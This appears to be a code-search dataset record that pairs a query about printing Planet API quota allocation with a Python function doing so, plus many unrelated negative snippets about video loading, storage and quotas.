info['frame_dir'] = frame_dir\n info['index'] = i\n info['label'] = -1 if 'answer_idx' not in video_info else video_info['answer_idx']\n info['text'] = [text]\n if self.is_ret:\n pass\n elif self.is_mc:\n info['clip_text_candidate'] = [0, 1, 2, 3, 4]\n elif self.is_qa:\n pass\n video_infos.append(info) \n del ann_info\n\n return video_infos", "def _loadData(self, data):\n Clip._loadData(self, data)\n PlexHistory._loadData(self, data)", "def load_frame_from_video(path: str, frame_index: int) -> np.ndarray:\n vid = load_video(path)\n img = vid[frame_index]\n return img", "def fetch_pyvideo_pk(self):\n url = 'http://pyvideo.org/search?models=videos.video&q={0}'.format(self.full_name.replace(\" \", \"+\"))\n soup = BeautifulSoup(requests.get(url).content).findAll(\"a\")\n if soup:\n for link in soup:\n if link.string == self.full_name:\n self.pyvideo_pk = link.get('href').split('/')[2]\n self.save()\n return self.pyvideo_pk\n self.pyvideo_pk = None\n self.save()\n return None", "def loadSeq(self):\n fileName = QtGui.QFileDialog.getOpenFileName( self, self.tr('Open Sequence'), '', \n self.tr('Sequence possibly with SSE predictions (*.seq)') )\n fileName = str(fileName)\n if fileName:\n self.structPred = StructurePrediction.load(fileName, self.app)\n return True\n else : \n return False", "def load(self, fileName=None, cacheString=None, callback=None):\n if fileName != None:\n self.videoPath = fileName\n if cacheString != None:\n self.cacheString = cacheString\n \n if not os.path.exists(self.videoPath):\n raise ValueError(\"ERROR : %s don't exist\" % (self.videoPath))\n \n if callback != None:\n callback(0.1, \"Load the video with OpenCV\")\n \n self.video = cv2.VideoCapture(self.videoPath)\n \n if(not self.video.isOpened()):\n self.video = None\n raise ValueError(\"ERROR : Can't load %s\" % (self.videoPath))\n \n self.fps = int(self.video.get(cv2.CAP_PROP_FPS))\n self.frameCount = self.realFrameNumber(callback)\n \n if callback != None:\n callback(0.85, \"Load or create the cache file\")\n \n # we load the cache\n self.cachePath = self.videoPath + self.cacheString + \".json\"\n self.loadCacheFile() #we load or create the cache file\n \n # we draw the first frame\n self.setFrame(0)", "def test_probe_video_from_file(self, test_video, config):\n full_path = os.path.join(VIDEO_DIR, test_video)\n probe_result = torch.ops.video_reader.probe_video_from_file(full_path)\n self.check_probe_result(probe_result, config)", "def load_velo(self):\n # Find all the Velodyne files\n velo_path = os.path.join(self.sequence_path, 'velodyne', '*.bin')\n velo_files = sorted(glob.glob(velo_path))\n\n # Subselect the chosen range of frames, if any\n if self.frame_range:\n velo_files = [velo_files[i] for i in self.frame_range]\n\n print('Found ' + str(len(velo_files)) + ' Velodyne scans...')\n\n # Read the Velodyne scans. Each point is [x,y,z,reflectance]\n self.velo = utils.load_velo_scans(velo_files)\n\n print('done.')", "def video_config():\n\tcap = cv2.VideoCapture(0)\n\twhile not cap.isOpened():\n\t cap = cv2.VideoCapture(0)\n\t cv2.waitKey(10)\n\t print \"Wait for the header\"\n\tpos_frame = cap.get(cv2.cv.CV_CAP_PROP_POS_FRAMES)\n\t\n\treturn cap, pos_frame", "def _load(self):\n if not self._loaded:\n url = f\"https://api.opendota.com/api/matches/{self.id}\"\n logger.info(\"Loading match details for match id: %s from url %s\",\n self._id, url)\n self.data = requests.get(url).json()\n self._duration = self.data.get('duration')\n self._chat = self.data.get('chat')\n self._cluster = self.data.get('cluster')\n self._engine = self.data.get('engine')\n self._first_blood_time = self.data.get('first_blood_time')\n self._game_mode = self.data.get('game_mode')\n self._human_players = self.data.get('human_players')\n self._league_id = self.data.get('league_id')\n self._lobby_type = self.data.get('lobby_type')\n self._match_seq_num = self.data.get('match_seq_num')\n self._negative_votes = self.data.get('negative_votes')\n self._positive_votes = self.data.get('positive_votes')\n self._objectives = self.data.get('objectives')\n self._picks_bans = self.data.get('picks_bans')\n self._barracks_status_dire = self.data.get('barracks_status_dire')\n self._dire_score = self.data.get('dire_score')\n self._dire_team = self.data.get('dire_team')\n self._tower_status_dire = self.data.get('tower_status_dire')\n self._barracks_status_radiant = self.data.get('barracks_status_radiant')\n self._radiant_gold_adv = self.data.get('radiant_gold_adv')\n self._radiant_xp_adv = self.data.get('radiant_xp_adv')\n self._radiant_score = self.data.get('radiant_score')\n self._radiant_team = self.data.get('radiant_team')\n self._radiant_win = self.data.get('radiant_win')\n self._tower_status_radiant = self.data.get('tower_status_radiant')\n self._start_time = self.data.get('start_time')\n self._teamfights = self.data.get('teamfights')\n self._version = self.data.get('version')\n self._replay_salt = self.data.get('replay_salt')\n self._series_id = self.data.get('series_id')\n self._series_type = self.data.get('series_type')\n self._league = self.data.get('league')\n self._skill = self.data.get('skill')\n self._players = self.data.get('players')\n self._patch = self.data.get('patch')\n self._region = self.data.get('region')\n self._all_word_counts = self.data.get('all_word_counts')\n self._version = self.data.get('version')\n self._throw = self.data.get('throw')\n self._comeback = self.data.get('comeback')\n self._cosmetics = self.data.get('cosmetics')\n self._draft_timings = self.data.get('draft_timings')\n self._loss = self.data.get('loss')\n self._win = self.data.get('win')\n self._replay_url = self.data.get('replay_url')\n self._loaded = True", "def get_video_data():\n\n vid_data = []\n with open('USvideos.csv', newline='') as csvfile:\n spamreader = csv.reader(csvfile, delimiter=',', quotechar='\"')\n for row in spamreader:\n if len(row) == 16:\n vid_dict = {'video_id': row[0],\n 'trending_date': row[1],\n 'title': row[2],\n 'channel_title': row[3],\n 'category_id': row[4],\n 'publish_times': row[5],\n 'tags': row[6],\n 'views': row[7],\n 'likes': row[8],\n 'dislikes': row[9],\n 'comment_count': row[10],\n 'thumbnail_link': row[11],\n 'comments_disabled': row[12],\n 'ratings_disabled': row[13],\n 'video_error': row[14],\n 'description': row[15]\n }\n vid_data.append(vid_dict)\n return vid_data", "def load_stream(filename, folder):\n cap = cv2.VideoCapture(os.path.join(folder, filename))\n while True:\n ret, frame = cap.read()\n cv2.imshow(\"img\", frame)\n if cv2.waitKey(1) & 0xFF == ord(\"q\"):\n cap.release()\n cv2.destroyAllWindows()\n break", "def update(self):\n self.frame = self.video_stream.read()", "def get_pimax_data_object(evt, src):\n o = evt.get(_psana.Pimax.FrameV1, src)\n if o is not None: return o\n\n return None", "def read(self, ifDrawAxis=None, ifDrawSquare=None):\n if(self.isLoaded() == False):\n return\n self.ret, frame = self.video.read()\n if (self.ret == True):\n \n # Draw frame\n self.currentFrame = frame\n self.currentFrameNumber = int(self.video.get(cv2.CAP_PROP_POS_FRAMES))\n \n else: # If the video is end\n self.isPlaying = False\n \n return self.frame(ifDrawAxis, ifDrawSquare)", "def load(self):\n canSave = self.canSave\n #--Header\n inPath = os.path.join(self.fileInfo.dir,self.fileInfo.name)\n ins = Tes3Reader(self.fileInfo.name,file(inPath,'rb'))\n (name,size,delFlag,recFlag) = ins.unpack('4s3i',16,'REC_HEAD')\n self.tes3 = Tes3(name,size,delFlag,recFlag,ins,True)\n #--Raw data read\n while not ins.atEnd():\n #--Get record info and handle it\n (name,size,delFlag,recFlag) = ins.unpackRecHeader()\n #--LEVC?\n if name == 'LEVC':\n levc = Levc(name,size,delFlag,recFlag,ins,True)\n self.levcs[levc.id] = levc\n if canSave: self.records.append(levc)\n #print ' Added:',levc.id\n elif name == 'LEVI':\n levi = Levi(name,size,delFlag,recFlag,ins,True)\n self.levis[levi.id] = levi\n if canSave: self.records.append(levi)\n #print ' Added:',levi.id\n #--Other\n elif canSave:\n record = Record(name,size,delFlag,recFlag,ins)\n self.records.append(record)\n else:\n ins.seek(size,1,'Record')\n #--Done Reading\n ins.close()", "def read_poses_for_camera(record_path, camera_name):\n\n # Resolve pose.txt file path for camera\n poses_path = os.path.join(record_path, camera_name, 'pose.txt')\n if os.path.exists(poses_path):\n poses = read_poses_dict(poses_path)\n else:\n # Sample type dataset (aka zpark-sample)\n poses_path = os.path.join(record_path, camera_name + '.txt')\n poses = read_poses_dict_6(poses_path)\n return poses", "def test_read_video_from_memory_get_pts_only(self, test_video, config):\n # video related\n width, height, min_dimension, max_dimension = 0, 0, 0, 0\n video_start_pts, video_end_pts = 0, -1\n video_timebase_num, video_timebase_den = 0, 1\n # audio related\n samples, channels = 0, 0\n audio_start_pts, audio_end_pts = 0, -1\n audio_timebase_num, audio_timebase_den = 0, 1\n\n _, video_tensor = _get_video_tensor(VIDEO_DIR, test_video)\n\n # pass 1: decode all frames using cpp decoder\n tv_result = torch.ops.video_reader.read_video_from_memory(\n video_tensor,\n SEEK_FRAME_MARGIN,\n 0, # getPtsOnly\n 1, # readVideoStream\n width,\n height,\n min_dimension,\n max_dimension,\n video_start_pts,\n video_end_pts,\n video_timebase_num,\n video_timebase_den,\n 1, # readAudioStream\n samples,\n channels,\n audio_start_pts,\n audio_end_pts,\n audio_timebase_num,\n audio_timebase_den,\n )\n assert abs(config.video_fps - tv_result[3].item()) < 0.01\n\n # pass 2: decode all frames to get PTS only using cpp decoder\n tv_result_pts_only = torch.ops.video_reader.read_video_from_memory(\n video_tensor,\n SEEK_FRAME_MARGIN,\n 1, # getPtsOnly\n 1, # readVideoStream\n width,\n height,\n min_dimension,\n max_dimension,\n video_start_pts,\n video_end_pts,\n video_timebase_num,\n video_timebase_den,\n 1, # readAudioStream\n samples,\n channels,\n audio_start_pts,\n audio_end_pts,\n audio_timebase_num,\n audio_timebase_den,\n )\n\n assert not tv_result_pts_only[0].numel()\n assert not tv_result_pts_only[5].numel()\n self.compare_decoding_result(tv_result, tv_result_pts_only)", "def fetch(self, movie_id: str) -> AVInfo:\n raise NotImplementedError()", "def expected_data(self):\n yaml_file = None\n for yaml_ext in YAML_EXTENSIONS:\n yaml_file = self.video_path + yaml_ext\n if os.path.isfile(yaml_file):\n break\n\n if not yaml_file or not os.path.isfile(yaml_file):\n raise IOError('Unable to find expected file for {!r}', self.video_path)\n\n return read_yaml(yaml_file)", "def load(self):\n self.data = NSPSpecIO().read(self.path)", "def from_platform(self):\n project_name = self.platform_params['project_name']\n project_id = self.platform_params['project_id']\n dataset_name = self.platform_params['dataset_name']\n dataset_id = self.platform_params['dataset_id']\n item_filepath = self.platform_params['item_filepath']\n item_id = self.platform_params['item_id']\n\n # load remote item\n if dataset_id is None:\n self.project = dl.projects.get(project_name=project_name, project_id=project_id)\n if self.project is None:\n raise ValueError('Project doesnt exists. name: %s, id: %s' % (project_name, project_id))\n self.dataset = self.project.datasets.get(dataset_name=dataset_name, dataset_id=dataset_id)\n else:\n self.dataset = dl.datasets.get(dataset_id=dataset_id)\n if self.dataset is None:\n raise ValueError('Dataset doesnt exists. name: %s, id: %s' % (dataset_name, dataset_id))\n self.item = self.dataset.items.get(filepath=item_filepath, item_id=item_id)\n if self.item is None:\n raise ValueError('Item doesnt exists. name: %s, id: %s' % (item_filepath, item_id))\n self.labels = {label.tag: label.rgb for label in self.dataset.labels}\n _, ext = os.path.splitext(self.item.filename[1:])\n video_filename = os.path.join(self.dataset.__get_local_path__(), self.item.filename[1:])\n if not os.path.isdir(os.path.dirname(video_filename)):\n os.makedirs(os.path.dirname(video_filename))\n if not os.path.isfile(video_filename):\n self.item.download(local_path=os.path.dirname(video_filename), to_items_folder=False)\n self.video_source = video_filename\n self.video_annotations = self.item.annotations.list()", "def load(self, p):\n return", "def get_vimba_data_object(evt, src):\n o = evt.get(_psana.Vimba.FrameV1, src)\n if o is not None: return o\n\n return None", "def video_single(request, vid):\n mongodb = get_db() \n [data, peaks] = video_single_query(vid)\n videos = video_info_query()\n # from edinsights.core.render import render\n return render(request, \"single-view.html\", {\n 'video_id': vid, 'data': data, 'videos': videos, 'peaks': peaks\n })", "def video_thread():\n global last_frame\n # Creating stream capture object\n cap = cv2.VideoCapture('udp://' + drone.tello_ip + ':11111')\n\n while(True):\n _, last_frame = cap.read()\n cap.release()", "def load(self, _fName, _testOnly=False): \n tempDir = os.path.dirname(_fName)\n if len(tempDir) > 0:\n tempDir += \"\\\\\"\n self.fNameVideo = _fName\n self.fExtVideo = os.path.splitext(_fName)[1].lower()\n self.isTestOnly = _testOnly\n \n if self.fExtVideo in glo.QDSpy_vidAllowedVideoExts:\n return self.__loadVideo()\n else:\n return stm.StimErrC.invalidVideoFormat", "def expected_data(self):\n yaml_file = None\n yaml_folder = os.path.normpath(os.path.join(os.path.split(self.video_path)[0], os.pardir))\n for yaml_ext in YAML_EXTENSIONS:\n yaml_file = os.path.join(yaml_folder, self.provider_name, os.path.basename(self.video_path) + yaml_ext)\n if os.path.isfile(yaml_file):\n break\n\n if not yaml_file or not os.path.isfile(yaml_file):\n raise IOError('Unable to find expected file for {!r}', self.video_path)\n\n return read_yaml(yaml_file)", "def _video_test_loader_from_config(cfg, dataset_name, mapper=None):\n dataset = get_video_detection_dataset_dicts(\n [dataset_name],\n filter_empty=False,\n proposal_files=[\n cfg.DATASETS.PROPOSAL_FILES_TEST[list(cfg.DATASETS.TEST).index(dataset_name)]\n ]\n if cfg.MODEL.LOAD_PROPOSALS\n else None,\n )\n if mapper is None:\n mapper = VideoDatasetMapper(cfg, False)\n return {\n \"dataset\": dataset,\n \"mapper\": mapper,\n \"num_workers\": cfg.DATALOADER.NUM_WORKERS,\n \"first_frame_indices\": MetadataCatalog.get(dataset_name).first_frame_indices,\n # \"sampler_pair_offset\": cfg.DATALOADER.SAMPLER_PAIR_OFFSET_TEST,\n }", "def load_data(self):\n raise NotImplementedError()", "def __init__(self, video: cv2.VideoCapture):\n self.video = video", "def video(ctx, video_file, analytic_addr):\n if not analytic_addr:\n analytic_addr = [\"localhost:50051\"]\n db = ctx.obj.db\n client = aceclient.AnalyticMultiClient()\n classes = {}\n cap = cv2.VideoCapture(video_file)\n window_names = []\n f_req = analytic_pb2.FrameRequest()\n for a in analytic_addr:\n analytic = analytic_pb2.AnalyticData()\n analytic.addr = a\n f_req.analytics.append(analytic)\n # Load all frames into a queue buffer\n buf = Queue()\n while (cap.isOpened()):\n ret, frame = cap.read()\n if not ret:\n break\n buf.put(frame)\n try:\n while not buf.empty():\n frame = buf.get(block=False)\n resp = analytic_pb2.CompositeResults()\n resp = client.process_frame(frame, f_req, resp)\n render(resp, window_names, classes, frame, db)\n finally:\n cv2.destroyAllWindows()\n print(\"Shutting down\")", "def isLoaded(self):\n if self.video == None:\n return False\n return True", "def __init__(self, video_source = 0):\n self.vid = cv2.VideoCapture(video_source)\n if not self.vid.isOpened():\n raise ValueError(\"Unable to open video source\", video_source)\n\n\n # Get video source width and height\n self.width = self.vid.get(cv2.CAP_PROP_FRAME_WIDTH)\n self.height = self.vid.get(cv2.CAP_PROP_FRAME_HEIGHT)" ]
[ "0.63587195", "0.6327954", "0.6313313", "0.6260543", "0.6144583", "0.60049814", "0.6003176", "0.5981438", "0.58994627", "0.5867908", "0.57829833", "0.5776408", "0.57461214", "0.57129264", "0.5711681", "0.5697466", "0.5672912", "0.55612403", "0.5529223", "0.552714", "0.5512627", "0.55091256", "0.5497744", "0.5479282", "0.5467995", "0.54570466", "0.53785074", "0.535449", "0.5338231", "0.53356856", "0.5322094", "0.53220105", "0.53205836", "0.53159815", "0.5310162", "0.53063256", "0.5304672", "0.53015774", "0.5296137", "0.52913356", "0.52885425", "0.5267676", "0.5265517", "0.52629614", "0.5262406", "0.5262348", "0.52517194", "0.52517194", "0.5237946", "0.52370226", "0.5233081", "0.5230195", "0.52256215", "0.5223842", "0.5214847", "0.520595", "0.5205746", "0.5172461", "0.51701987", "0.5167225", "0.5165457", "0.5161735", "0.5160994", "0.51519144", "0.5148111", "0.51252604", "0.51251197", "0.5124408", "0.5119616", "0.51189375", "0.5118376", "0.5116994", "0.5115963", "0.5109862", "0.51028025", "0.50572854", "0.50387454", "0.5037337", "0.50261354", "0.5020558", "0.50178707", "0.5016372", "0.5013567", "0.50092304", "0.50048864", "0.50042206", "0.49900094", "0.49876142", "0.498732", "0.49799258", "0.4979824", "0.4977684", "0.49767873", "0.49717", "0.49700493", "0.49627575", "0.4936365", "0.49336508", "0.4928939", "0.49268115", "0.4923452" ]
0.0
-1
Print allocation and remaining quota in Sqkm.
def quota(): try: fname = os.path.join(os.path.expanduser("~"), ".planet.json") contents = {} if os.path.exists(fname): with open(fname, "r") as fp: contents = json.loads(fp.read()) else: raise IOError("Escape to End and Initialize") if not len(contents) != 0: raise IOError("Escape to End and Initialize") else: k = contents["key"] main = requests.get( "https://api.planet.com/auth/v1/" + "experimental/public/my/subscriptions", auth=HTTPBasicAuth(k, ""), ) if main.status_code == 200: content = main.json() for item_id in content: print(" ") print("Allocation Name: %s" % item_id["organization"]["name"]) print( "Allocation active from: %s" % item_id["active_from"].split("T")[0] ) print("Quota Enabled: %s" % item_id["quota_enabled"]) print("Total Quota in SqKm: %s" % item_id["quota_sqkm"]) print("Total Quota used: %s" % item_id["quota_used"]) if (item_id["quota_sqkm"]) is not None: leftquota = float( item_id["quota_sqkm"] - float(item_id["quota_used"]) ) print("Remaining Quota in SqKm: %s" % leftquota) else: print("No Quota Allocated") print("") else: print("Failed with exception code: " + str(main.status_code)) except IOError: print("Initialize client or provide API Key")
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def print_usage(self):\r\n print 'Total Usage: %f compute seconds' % self.box_usage\r\n cost = self.box_usage * 0.14\r\n print 'Approximate Cost: $%f' % cost", "def print_usage(self):\n print('Total Usage: %f compute seconds' % self.box_usage)\n cost = self.box_usage * 0.14\n print('Approximate Cost: $%f' % cost)", "def make_output_quota(self, quota):\n self.reset()\n self.run_ten_years_quota(quota)\n return self.show_results()", "def print_output():\n print(\"count: [primary: \"+str(primary_shards)+\", replica: \"+str(secondary_shards)+\"]\")\n print(\"size: [primary: \"+pretty_print_storage(total_size_primary)+\", replica: \"+pretty_print_storage(total_size_secondary)+\"]\")\n print(\"disk-max-node: \"+max_size_node_name)\n print(\"watermark-breached: \"+str(watermark_breached))", "def __str__(self):\n quota = self.id + \" = \" + str(self.usage)\n if self.units != 'integer':\n quota += \"\" + self.units\n return quota", "def print_mem_usage(usage):\n for region in usage.keys():\n used = usage[region][\"used\"]\n free = usage[region][\"free\"]\n usage_msg = \"{region}:\\n used: {used} bytes\\n free: {free} bytes\"\n usage_msg = usage_msg.format(region=region, used=used, free=free)\n print(usage_msg)", "def quota(self) -> 'outputs.CommitmentQuotaResponse':\n return pulumi.get(self, \"quota\")", "def get_quota(self):\n raise NotImplementedError", "def test_list_cluster_resource_quota(self):\n pass", "def print_me(self, tabs=0, tab=' '):\n pre = tab*tabs\n print(pre+'Storage:')\n print(pre+' stores:', self._stores)\n print(pre+' rate:', self._rate)\n print(pre+' capacity:', self._capacity)", "def api_quota_command():\n # 1. There is no parameter input required from Demisto\n # 2. Get the quota status info from SlashNext API\n response = api_quota()\n if response.get('errorNo') != 0:\n return\n # 3. Parse and format the response\n quota_data = response.get('quotaDetails')\n\n title = 'SlashNext Phishing Incident Response - API Quota\\n'\\\n '##### Note: {}'.format(quota_data.get('note'))\n\n snx_ioc_cont = {\n 'LicensedQuota': quota_data.get('licensedQuota'),\n 'RemainingQuota': quota_data.get('remainingQuota'),\n 'ExpirationDate': quota_data.get('expiryDate'),\n 'IsExpired': quota_data.get('isExpired')\n }\n\n ec = {\n 'SlashNext.Quota(val.Value === obj.Value)': snx_ioc_cont\n }\n\n md = tableToMarkdown(\n title,\n snx_ioc_cont,\n ['LicensedQuota',\n 'RemainingQuota',\n 'ExpirationDate']\n )\n\n return_outputs(md, ec, snx_ioc_cont)", "def __repr__(self):\n return \"This {} has {} GB of memory\".format(\n self.name,\n self.memory_in_gb\n )", "def show_supply(self):\n print(self.total_supply)", "def show_board(self):\n print(self.capacity_list)", "def quota(self) -> int:\n return pulumi.get(self, \"quota\")", "def account_space(access_token):\n client = dropbox.client.DropboxClient(access_token)\n account_info = client.account_info()\n quota_info = account_info['quota_info']\n total = quota_info['quota']\n used = quota_info['normal'] + quota_info['shared']\n return total - used", "def show(self, threadID):\n print(\"[thread %d] Simulated Clustered Disk Space Allocation\" % threadID)\n line = '=' * 32\n print line\n for i in range(self.size/32):\n print ''.join(self.disk_mem[32*i:32*(i+1)])\n print line", "def printing():\r\n document.add_heading('Printing Service details', 1)\r\n\r\n printing_metrics = ['customproperties',\r\n 'workingSetSizeHiPct',\r\n 'logVerbosityAuditActivity',\r\n 'logVerbosityService',\r\n 'hostname',\r\n 'tags']\r\n\r\n printnodes = get_qlik_sense.get_printing()\r\n num_of_nodes = len(printnodes)\r\n num_of_print_metrics = len(printing_metrics)\r\n table = document.add_table(rows=num_of_print_metrics+1, cols=num_of_nodes+1)\r\n table.style = 'Grid Table 1 Light Accent 1'\r\n row = table.rows[0]\r\n row.cells[0].text = 'Metric'\r\n for item in range(0, num_of_nodes):\r\n row.cells[item+1].text = printnodes[item][6]\r\n for item in range(num_of_print_metrics):\r\n row = table.rows[item+1]\r\n row.cells[0].text = str(printing_metrics[item])\r\n for printnode in range(num_of_nodes):\r\n row.cells[printnode+1].text = str(printnodes[printnode][item])\r\n\r\n document.add_page_break()", "def ok(self, results):\n return \"{:5.2f}% capacity used\".format(\n results[\"usage\"].resource.usage_ratio * 100.0\n )", "def print_me(self, tabs=0, tab=' '):\n pre = tab*tabs\n print(pre+'Demand/Load:')\n print(pre+' demands:', self._demands)\n print(pre+' penalty:', self._penalty)\n print(pre+' capacity:', self._capacity)", "def _print_progress(self):\n print(\n 'E {} S {} TR {:6.2f} G {:6.2f} Reg {:6.5f} Loss {:6.5f} AvgQ {:6.2f}'\n ' MinR {:6.2f} MaxR {:6.2f}'.format(\n self.episode, self.episode_step, self.tracker.total_reward, self.tracker.discounted_rewards,\n self.reg_loss_val, self.critic_loss_val, self.mean_q_val,\n self.tracker.min_reward, self.tracker.max_reward))", "def _get_capacity_info(self, nfs_share):\n nms = self.share2nms[nfs_share]\n ns_volume, ns_folder = self._get_share_datasets(nfs_share)\n folder_props = nms.folder.get_child_props('%s/%s' % (ns_volume,\n ns_folder),\n 'used|available')\n free = utils.str2size(folder_props['available'])\n allocated = utils.str2size(folder_props['used'])\n self.shares_with_capacities[nfs_share] = {\n 'free': utils.str2gib_size(free),\n 'total': utils.str2gib_size(free + allocated)}\n return free + allocated, free, allocated", "def collect_metrics():\n p = os.path.join(os.sep, \"mnt\", \"glusterfs\")\n mount_stats = os.statvfs(p)\n # block size * total blocks\n total_space = mount_stats.f_blocks * mount_stats.f_bsize\n free_space = mount_stats.f_bfree * mount_stats.f_bsize\n # capsize only operates on i64 values\n used_space = total_space - free_space\n gb_used = used_space / 1024 / 1024 / 1024\n\n # log!(format!(\"Collecting metric gb-used {}\", gb_used), Info)\n add_metric(\"gb-used\", \"{}\".format(gb_used))", "def show(self, req, tenant_id, id):\n LOG.info(\"Indexing quota info for tenant '%(id)s'\\n\"\n \"req : '%(req)s'\\n\\n\", {\"id\": id, \"req\": req})\n\n context = req.environ[wsgi.CONTEXT_KEY]\n if id != tenant_id and not context.is_admin:\n raise exception.TroveOperationAuthError(\n tenant_id=tenant_id\n )\n\n usages = quota_engine.get_all_quota_usages_by_tenant(id)\n limits = quota_engine.get_all_quotas_by_tenant(id)\n for key in usages.keys():\n setattr(usages[key], \"limit\", limits[key].hard_limit)\n return wsgi.Result(views.QuotaUsageView(usages).data(), 200)", "def show_quota(self, tenant_id, **_params):\r\n return self.get(self.quota_path % (tenant_id), params=_params)", "def log_free_disk_space():\n cmd = 'df -h'\n p = Popen(cmd, shell=True, stdout=PIPE)\n res = p.communicate()\n if res[0]:\n res = res[0]\n else:\n res = res[1]\n logger.warning('Disk usage statisticks:')\n logger.warning(res)", "def api_quota():\n # Create the required data dictionary for Quota/Status\n api_data = {} # type: Dict[str, str]\n response = http_request(endpoint=API_QUOTA, data=api_data)\n\n if response.get('errorNo') != 0:\n return_error('API Returned, {}:{}'.format(response.get('errorNo'), response.get('errorMsg')))\n\n return response", "def show_queue(Q):\n print(\"(Size of the queue:\", Q.qsize(), \")\", end=\" \")\n for n in list(Q.queue):\n print(n, end=\" \")\n print()", "def print_current_mem_usage():\n mem = get_current_mem_usage()\n output = \"# Mem usage = {} MiB #\".format(mem)\n print(\"\\n\" + \"-\" * len(output))\n print(output)\n print(\"-\" * len(output) + \"\\n\")", "def test_read_cluster_resource_quota_status(self):\n pass", "def print_students_gpa(std):\n print (\"Student Id:\", get_id(std))\n print (\"Student name:\", get_fname(get_name(std)), get_lname(get_name(std)))\n print (\"GPA: %.2f\" %(calc_gpa(std)))", "def _get_share_capacity_info(self):\n lcfg = self.configuration\n share_details = self.zfssa.get_share(lcfg.zfssa_nfs_pool,\n lcfg.zfssa_nfs_project,\n lcfg.zfssa_nfs_share)\n\n free = share_details['space_available']\n used = share_details['space_total']\n return free, used", "def do_quota_class_get(cs, args):\n utils.print_dict(cs.quota_classes.get(args.quota_class_name)._info)", "def get_space_used():\n fs.get_space_used()", "def get_usage(self):\r\n return self.box_usage", "def _print_progress(self):\n if self.current_training_size % 1000 == 0:\n print(self.current_training_size, end='')\n elif self.current_training_size % 100 == 0:\n print('.', end='')", "def print_allocations(self, ):\n pass", "def main(self, names, options) :\n names = self.sanitizeNames(options, names)\n suffix = (options[\"groups\"] and \"Group\") or \"User\" \n printernames = options[\"printer\"].split(\",\")\n \n if not options[\"list\"] :\n percent = Percent(self)\n percent.display(\"%s...\" % _(\"Extracting datas\"))\n printers = self.storage.getMatchingPrinters(options[\"printer\"])\n entries = getattr(self.storage, \"getMatching%ss\" % suffix)(\",\".join(names))\n if not options[\"list\"] :\n percent.setSize(len(printers) * len(entries))\n \n if options[\"list\"] :\n for printer in printers :\n for entry in entries :\n pqentry = getattr(self.storage, \"get%sPQuota\" % suffix)(entry, printer)\n if pqentry.Exists :\n print \"%s@%s\" % (entry.Name, printer.Name)\n print \" %s\" % (_(\"Page counter : %s\") % pqentry.PageCounter)\n print \" %s\" % (_(\"Lifetime page counter : %s\") % pqentry.LifePageCounter)\n print \" %s\" % (_(\"Soft limit : %s\") % pqentry.SoftLimit)\n print \" %s\" % (_(\"Hard limit : %s\") % pqentry.HardLimit)\n print \" %s\" % (_(\"Date limit : %s\") % pqentry.DateLimit)\n print \" %s (Not supported yet)\" % (_(\"Maximum job size : %s\") % ((pqentry.MaxJobSize and (_(\"%s pages\") % pqentry.MaxJobSize)) or _(\"Unlimited\")))\n if hasattr(pqentry, \"WarnCount\") :\n print \" %s\" % (_(\"Warning banners printed : %s\") % pqentry.WarnCount)\n print\n elif options[\"delete\"] : \n percent.display(\"\\n%s...\" % _(\"Deletion\"))\n getattr(self.storage, \"deleteMany%sPQuotas\" % suffix)(printers, entries)\n percent.display(\"\\n\")\n else :\n skipexisting = options[\"skipexisting\"]\n used = options[\"used\"]\n if used :\n used = used.strip()\n try :\n int(used)\n except ValueError :\n raise CPSCommandLineError, _(\"Invalid used value %s.\") % used\n \n increase = options[\"increase\"]\n if increase :\n try :\n increase = int(increase.strip())\n except ValueError :\n raise CPSCommandLineError, _(\"Invalid increase value %s.\") % increase\n \n noquota = options[\"noquota\"]\n reset = options[\"reset\"] \n hardreset = options[\"hardreset\"]\n softlimit = hardlimit = None\n if not noquota :\n if options[\"softlimit\"] :\n try :\n softlimit = int(options[\"softlimit\"].strip())\n if softlimit < 0 :\n raise ValueError\n except ValueError : \n raise CPSCommandLineError, _(\"Invalid softlimit value %s.\") % options[\"softlimit\"]\n if options[\"hardlimit\"] :\n try :\n hardlimit = int(options[\"hardlimit\"].strip())\n if hardlimit < 0 :\n raise ValueError\n except ValueError : \n raise CPSCommandLineError, _(\"Invalid hardlimit value %s.\") % options[\"hardlimit\"]\n if (softlimit is not None) and (hardlimit is not None) and (hardlimit < softlimit) : \n # error, exchange them\n self.printInfo(_(\"Hard limit %i is less than soft limit %i, values will be exchanged.\") % (hardlimit, softlimit))\n (softlimit, hardlimit) = (hardlimit, softlimit)\n if hardlimit is None : \n hardlimit = softlimit\n if hardlimit is not None :\n self.printInfo(_(\"Undefined hard limit set to soft limit (%s).\") % str(hardlimit))\n if softlimit is None : \n softlimit = hardlimit\n if softlimit is not None :\n self.printInfo(_(\"Undefined soft limit set to hard limit (%s).\") % str(softlimit))\n \n self.storage.beginTransaction() \n try :\n if options[\"add\"] :\n percent.display(\"\\n%s...\\n\" % _(\"Creation\"))\n if not entries : \n self.printInfo(_(\"No entry matches %s. Please use pkusers to create them first.\") % (\" \".join(names)), \"warn\")\n \n factory = globals()[\"Storage%sPQuota\" % suffix]\n for printer in printers :\n pname = printer.Name\n for entry in entries :\n ename = entry.Name\n pqkey = \"%s@%s\" % (ename, pname)\n pqentry = factory(self.storage, entry, printer)\n self.modifyPQEntry(pqkey, pqentry, noquota, \\\n softlimit, hardlimit, \\\n increase, reset, \\\n hardreset, suffix, used)\n oldpqentry = getattr(self.storage, \"add%sPQuota\" % suffix)(pqentry)\n if oldpqentry is not None : \n if skipexisting :\n self.logdebug(\"%s print quota entry %s@%s already exists, skipping.\" % (suffix, ename, pname))\n else : \n self.logdebug(\"%s print quota entry %s@%s already exists, will be modified.\" % (suffix, ename, pname))\n self.modifyPQEntry(pqkey, oldpqentry, noquota, \\\n softlimit, hardlimit, \\\n increase, reset, \\\n hardreset, suffix, used)\n oldpqentry.save() \n percent.oneMore()\n else : \n percent.display(\"\\n%s...\\n\" % _(\"Modification\"))\n for printer in printers :\n for entry in entries :\n pqkey = \"%s@%s\" % (entry.Name, printer.Name)\n pqentry = getattr(self.storage, \"get%sPQuota\" % suffix)(entry, printer)\n if pqentry.Exists : \n self.modifyPQEntry(pqkey, pqentry, noquota, \\\n softlimit, hardlimit, \\\n increase, reset, \\\n hardreset, suffix, used)\n pqentry.save() \n percent.oneMore()\n except : \n self.storage.rollbackTransaction()\n raise\n else : \n self.storage.commitTransaction()\n \n if not options[\"list\"] :\n percent.done()", "def capacity_gb(self) -> str:\n return pulumi.get(self, \"capacity_gb\")", "def getquota(self, mailbox):\n if \"QUOTA\" not in self.capabilities:\n self.quota_limit = self.quota_current = 